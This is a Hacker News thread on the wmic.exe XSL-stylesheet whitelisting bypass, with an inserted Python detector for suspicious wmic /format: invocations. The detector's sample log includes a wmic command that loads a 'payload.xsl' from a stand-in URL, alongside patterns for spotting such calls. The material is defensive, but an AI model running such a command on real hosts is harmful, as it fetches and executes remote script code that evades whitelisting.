
Wmic.exe Whitelisting Bypass – Hacking with Style, Stylesheets (2018) - kencausey
https://subt0x11.blogspot.com/2018/04/
======
0xDEFC0DE
It's worth noting that Windows Defender stops the 'remote include' part even
if there's nothing in the file (test.txt only contains the word 'blah' so we
should get a parsing/stylesheet error):

[https://i.imgur.com/jP3yJNQ.jpg](https://i.imgur.com/jP3yJNQ.jpg)

~~~
Izmaki
You beat me to it :D

------
kencausey
This story appears to be related to this:

[https://news.ycombinator.com/item?id=20384519](https://news.ycombinator.com/item?id=20384519)

More info (with some marketing):

[https://www.microsoft.com/security/blog/2019/07/08/dismantli...](https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/?utm_source=Direct)

------
ktpsns
This is something which baffles me as a +15yrs "linux guy" who thought he knew
what kind of ecosystem the big desktop OS brings: MS Windows is really rich in
tooling, both in terms of desktop and command line tools. And there is similar
bloat as with Linux: I never heard of wmic.exe before, but the fact that it
can be used to manage network interfaces sounds similarly fucked up as the
linux story (/sbin/ifconfig, /sbin/ip, the unloved network manager, resolv.d,
etc. pp). Just to give another example: mshta.exe was basically the Electron
platform but in early 2000. And it was shipped right out of the box. That's
very elegant.

Since I have an addiction to writing tools which solve problems they were not
intended to solve (violating Unix philosophy), I admire that wmic.exe can use
XSLT to generate reports. Of course, PowerShell solves the problem of
structured output in a better way. A contemporary Unix tool would simply have
the option for JSON output and that's it. But including an XSL processor which
even executes scripting languages... hilarious!

------
toyg
Before inevitable anti-XML comments appear: the hole is due to Microsoft
making it possible to execute VB code included in what were supposed to be
_style_ sheets. It’s like blindly eval()ing a json field: a bad idea
regardless of format, and not part of the spec (if I remember correctly).

------
kencausey
And here is a MITRE entry:

[https://attack.mitre.org/techniques/T1220/](https://attack.mitre.org/techniques/T1220/)
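The T1220 entry above is about wmic.exe loading an XSL stylesheet through its /format: switch, and 0xDEFC0DE's screenshot shows Defender catching the remote fetch. A complementary, host-independent check is to look at process-creation logs for wmic invocations whose stylesheet comes from a URL, a UNC share, or a local path outside the wbem directory where the built-in stylesheets live. The script below is an added example for this thread, not code from the blog post, MITRE or any commenter; the log lines are constructed, and the pipe-separated `timestamp|image|command line` layout is an assumed simplification rather than a real Sysmon or EDR format.

```python
"""Flag wmic.exe invocations whose /format: stylesheet is remote or unexpected
(MITRE ATT&CK T1220, XSL Script Processing). Added example; the sample log and
its field layout are constructed for illustration."""
import re
from typing import Dict, List

# wmic's /format: switch names an XSL stylesheet used to render the output.
FORMAT_RE = re.compile(r'/format:(.+)', re.IGNORECASE)
# Remote sources: http(s) URLs or UNC paths (\\server\share\...).
REMOTE_RE = re.compile(r'^(https?://|\\\\)', re.IGNORECASE)
# The stylesheets that ship with WMI live here; anything else deserves a look.
BUILTIN_DIR = r'c:\windows\system32\wbem'

# Constructed sample: timestamp|image|command line (not a real log format).
SAMPLE_LOG = """\
2019-07-08T10:00:01|C:\\Windows\\System32\\wbem\\WMIC.exe|wmic os get caption /format:list
2019-07-08T10:00:02|C:\\Windows\\System32\\wbem\\WMIC.exe|wmic process list /format:"https://example.invalid/payload.xsl"
2019-07-08T10:00:03|C:\\Windows\\System32\\wbem\\WMIC.exe|wmic os get /format:"C:\\Users\\Public\\report.xsl"
2019-07-08T10:00:04|C:\\Windows\\System32\\notepad.exe|notepad /format:anything.txt
2019-07-08T10:00:05|C:\\Windows\\System32\\wbem\\WMIC.exe|wmic os get /FORMAT:htable
"""


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line into arguments, keeping quoted spans
    (including embedded spaces) together, then drop the quote characters."""
    return [t.replace('"', '') for t in re.findall(r'(?:[^\s"]+|"[^"]*")+', cmdline)]


def classify_format_arg(value: str) -> str:
    """Classify the stylesheet reference given to /format:."""
    v = value.strip().replace('"', '').lower()
    if REMOTE_RE.match(v):
        return 'remote'
    if '\\' in v or '/' in v:
        return 'builtin-path' if v.startswith(BUILTIN_DIR) else 'local-path'
    # A bare name such as "list" or "htable" resolves to a shipped stylesheet.
    return 'builtin-name'


def find_suspicious_wmic(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per wmic command line that pulls its stylesheet from
    a remote location or from a local path outside the wbem directory."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, image, cmdline = line.split('|', 2)
        if not image.lower().endswith('\\wmic.exe'):
            continue  # only wmic treats /format: as a stylesheet
        for tok in tokenize(cmdline):
            m = FORMAT_RE.match(tok)
            if not m:
                continue
            kind = classify_format_arg(m.group(1))
            if kind in ('remote', 'local-path'):
                findings.append({'time': ts, 'kind': kind,
                                 'stylesheet': m.group(1), 'cmdline': cmdline})
    return findings


if __name__ == '__main__':
    for f in find_suspicious_wmic(SAMPLE_LOG):
        print(f"{f['time']} [{f['kind']}] {f['stylesheet']}  <-  {f['cmdline']}")
```

Only the two lines that point wmic at a URL and at a stylesheet under C:\Users\Public are reported; the built-in `list` and `htable` names and the unrelated notepad line are ignored. A local stylesheet outside wbem is flagged at all because the download step can be separated from the execution step, so a command-line rule keyed only on `http` would miss the second stage.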

------
tinus_hn
Why does it run untrusted shortcut files in the first place? That’s where you
need to block, it’s clearly as bad as running executables sent through email.

~~~
kencausey
How is trust recorded for a shortcut?

~~~
tinus_hn
The same way it is recorded for any file: an attribute that says it came from
the web or email.

~~~
kencausey
Ah right, I wasn't thinking about that type of trust but I agree it is the
correct property in this situation.

